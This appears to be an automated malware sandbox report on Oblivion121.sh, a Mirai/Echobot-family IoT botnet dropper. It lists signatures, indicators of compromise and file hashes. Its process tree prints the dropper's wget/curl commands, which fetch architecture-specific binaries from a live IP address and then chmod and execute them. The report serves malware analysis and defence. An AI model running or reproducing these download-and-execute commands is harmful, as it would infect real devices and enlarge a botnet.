Analysis
-
max time kernel
122s -
max time network
151s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
29/03/2025, 15:48
Static task
static1
Behavioral task
behavioral1
Sample
Oblivion121.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
Oblivion121.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
Oblivion121.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
Oblivion121.sh
-
Size
1KB
-
MD5
506ea803fdb2d5a593683fe98fec6f1f
-
SHA1
f71d6ccbfd48bff6ba7c06a7250e137f5ab75066
-
SHA256
71451b64fc1acf7e50295e14859f7957966210efb8351a26882f96781aa7c4e1
-
SHA512
213cf82427a6b073293b65f0745fa5bc95e24c7f684aec2f97b7548d4d099c0a0251f691d4a514818da6ad5b6674c55549eaa960a7ac7e2d28ee391d9d626fc5
Malware Config
Signatures
-
Detected Echobot 3 IoCs
resource yara_rule behavioral4/files/fstream-1.dat family_echobot behavioral4/files/fstream-4.dat family_echobot behavioral4/files/fstream-5.dat family_echobot -
Echobot family
-
Mirai family
-
Contacts a large (116052) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 748 chmod 795 chmod 893 chmod 741 chmod 768 chmod 832 chmod 879 chmod 909 chmod 923 chmod 937 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/cp 742 Oblivion121.sh /tmp/cp 749 Oblivion121.sh /tmp/cp 769 Oblivion121.sh /tmp/cp 797 Oblivion121.sh /tmp/cp 833 Oblivion121.sh /tmp/cp 880 Oblivion121.sh /tmp/cp 894 Oblivion121.sh /tmp/cp 910 Oblivion121.sh /tmp/cp 924 Oblivion121.sh /tmp/cp 938 Oblivion121.sh -
Modifies Watchdog functionality 1 TTPs 16 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp -
Enumerates active TCP sockets 1 TTPs 8 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp -
Changes its process name 8 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself efb3a2jjag51bmn4gie 769 cp Changes the process name, possibly in an attempt to hide itself a3hijddk 797 cp Changes the process name, possibly in an attempt to hide itself 3emdfmfb5nkmd00 833 cp Changes the process name, possibly in an attempt to hide itself 15eek3g1n1fm1f1 880 cp Changes the process name, possibly in an attempt to hide itself niojpdpm20cd3mg2mjk 894 cp Changes the process name, possibly in an attempt to hide itself moc3kefh3kge4nm 910 cp Changes the process name, possibly in an attempt to hide itself gcfg3mffhcomp 924 cp Changes the process name, possibly in an attempt to hide itself 4cne33ge 938 cp -
Reads system network configuration 1 TTPs 8 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp -
description ioc Process File opened for reading /proc/712/fd cp File opened for reading /proc/338/fd cp File opened for reading /proc/687/fd cp File opened for reading /proc/685/fd cp File opened for reading /proc/339/fd cp File opened for reading /proc/341/fd cp File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/1/fd cp File opened for reading /proc/337/fd cp File opened for reading /proc/335/fd cp File opened for reading /proc/337/fd cp File opened for reading /proc/1/fd cp File opened for reading /proc/338/fd cp File opened for reading /proc/685/fd cp File opened for reading /proc/771/fd cp File opened for reading /proc/250/fd cp File opened for reading /proc/1/fd cp File opened for reading /proc/335/fd cp File opened for reading /proc/339/fd cp File opened for reading /proc/712/fd cp File opened for reading /proc/390/fd cp File opened for reading /proc/425/fd cp File opened for reading /proc/820/exe cp File opened for reading /proc/250/fd cp File opened for reading /proc/687/fd cp File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/683/fd cp File opened for reading /proc/339/fd cp File opened for reading /proc/337/fd cp File opened for reading /proc/678/fd cp File opened for reading /proc/717/fd cp File opened for reading /proc/425/fd cp File opened for reading /proc/335/fd cp File opened for reading /proc/339/fd cp File opened for reading /proc/681/fd cp File opened for reading /proc/337/fd cp File opened for reading /proc/687/fd cp File opened for reading /proc/800/fd cp File opened for reading /proc/250/fd cp File opened for reading /proc/804/fd cp File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/146/fd cp File opened for reading /proc/704/fd cp File opened for reading /proc/685/fd cp File opened for reading /proc/685/fd cp File opened for reading /proc/338/fd cp File opened for reading /proc/685/fd cp File opened for reading /proc/339/fd cp File opened for reading /proc/386/fd cp File opened for reading /proc/717/fd cp File opened for reading /proc/384/fd cp File opened for reading /proc/678/exe cp File opened for reading /proc/911/exe cp File opened for reading /proc/820/fd cp File opened for reading /proc/712/fd cp File opened for reading /proc/712/fd cp File opened for reading /proc/683/fd cp File opened for reading /proc/911/fd cp File opened for reading /proc/337/fd cp File opened for reading /proc/678/fd cp File opened for reading /proc/712/fd cp File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/338/fd cp File opened for reading /proc/337/fd cp -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 746 curl 747 cat 749 cp 745 wget -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jade420.mips wget File opened for modification /tmp/jade420.arm4 curl File opened for modification /tmp/jade420.arm5 curl File opened for modification /tmp/jade420.arm7 curl File opened for modification /tmp/jade420.ppc curl File opened for modification /tmp/cp Oblivion121.sh File opened for modification /tmp/jade420.mpsl wget File opened for modification /tmp/jade420.mpsl curl File opened for modification /tmp/jade420.arm6 wget File opened for modification /tmp/jade420.m68k wget File opened for modification /tmp/jade420.sh4 curl File opened for modification /tmp/jade420.x86 wget File opened for modification /tmp/jade420.mips curl File opened for modification /tmp/jade420.arm5 wget File opened for modification /tmp/jade420.arm6 curl File opened for modification /tmp/jade420.m68k curl File opened for modification /tmp/jade420.sh4 wget File opened for modification /tmp/jade420.x86 curl File opened for modification /tmp/jade420.arm7 wget File opened for modification /tmp/jade420.ppc wget
Processes
-
/tmp/Oblivion121.sh/tmp/Oblivion121.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:712 -
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.x862⤵
- Writes file to tmp directory
PID:715
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.x862⤵
- Writes file to tmp directory
PID:733
-
-
/bin/catcat jade420.x862⤵PID:740
-
-
/bin/chmodchmod +x cp jade420.x86 Oblivion121.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-wm67od2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/cp./cp x862⤵PID:742
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:745
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:746
-
-
/bin/catcat jade420.mips2⤵
- System Network Configuration Discovery
PID:747
-
-
/bin/chmodchmod +x cp jade420.mips jade420.x86 Oblivion121.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-wm67od2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/cp./cp mips2⤵
- System Network Configuration Discovery
PID:749
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.mpsl2⤵
- Writes file to tmp directory
PID:751
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.mpsl2⤵
- Writes file to tmp directory
PID:752
-
-
/bin/catcat jade420.mpsl2⤵PID:767
-
-
/bin/chmodchmod +x cp jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-wm67od2⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/cp./cp mpsl2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:769
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.arm42⤵PID:774
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.arm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:785
-
-
/bin/chmodchmod +x cp jade420.arm4 jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-wm67od2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/cp./cp arm42⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:797
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.arm52⤵
- Writes file to tmp directory
PID:828
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/chmodchmod +x cp jade420.arm4 jade420.arm5 jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-wm67od2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/cp./cp arm52⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:833
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.arm62⤵
- Writes file to tmp directory
PID:876
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.arm62⤵
- Writes file to tmp directory
PID:877
-
-
/bin/chmodchmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/cp./cp arm62⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:880
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.arm72⤵
- Writes file to tmp directory
PID:884
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.arm72⤵
- Writes file to tmp directory
PID:891
-
-
/bin/chmodchmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/cp./cp arm72⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:894
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.ppc2⤵
- Writes file to tmp directory
PID:900
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.ppc2⤵
- Writes file to tmp directory
PID:907
-
-
/bin/chmodchmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.mips jade420.mpsl jade420.ppc jade420.x86 Oblivion121.sh2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/cp./cp ppc2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:910
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.m68k2⤵
- Writes file to tmp directory
PID:914
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/chmodchmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.m68k jade420.mips jade420.mpsl jade420.ppc jade420.x86 Oblivion121.sh2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/cp./cp m68k2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:924
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.sh42⤵
- Writes file to tmp directory
PID:928
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/chmodchmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.m68k jade420.mips jade420.mpsl jade420.ppc jade420.sh4 jade420.x86 Oblivion121.sh2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/cp./cp sh42⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:938
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD53d2c880e79089241c8fbb272ee31060b
SHA123233e3043dc70c1e21e352f99bdcfc70a233dcd
SHA2567961cf5c0d14018d558bdb82ee0f4bb07967e1fd671444dd708ed782fdda54e4
SHA5121246ed2d4bdfe5f43f6f6ea13704d9a5c59c70d446b16be55103de187e2a97912e89ff1ff44553b900fba08e977309f2804af47a0afc6120555fe04afd5718e3
-
Filesize
99KB
MD56f5fba17cf8cff755d5d8c512df7ac69
SHA113808a7c0b1b1ee0f8e87030861727235b22ba4f
SHA256b830cebb06671935a97e8dde66857eef6343fd20fa44c3e9af3d73b26d3eedc7
SHA512d3dc9cdfb5033016847a9a285c845fd3697ce6498a175ad834c22ee4b70d13065a6d9dbacd794b2a3490dcccfdfae414174842c57c65ed29cc561f4cae988431
-
Filesize
68KB
MD5ca9c4fc72ea948856f5a37956f167bfc
SHA1a689a0fc903757672b777dda4f82a8688556d333
SHA25696f4ce7b2e797678dab4ccafd828ace3718b945bfe8a05357688a5cd2d166fc4
SHA512900e34ae8667a6cea737e5a16c3143d9ab8e20a3f466bc6b616bf47fc961809bfd3ffcdc938c0941c4209ac3ed4af2066d82942dd45e05f78199e87d9a87ddf2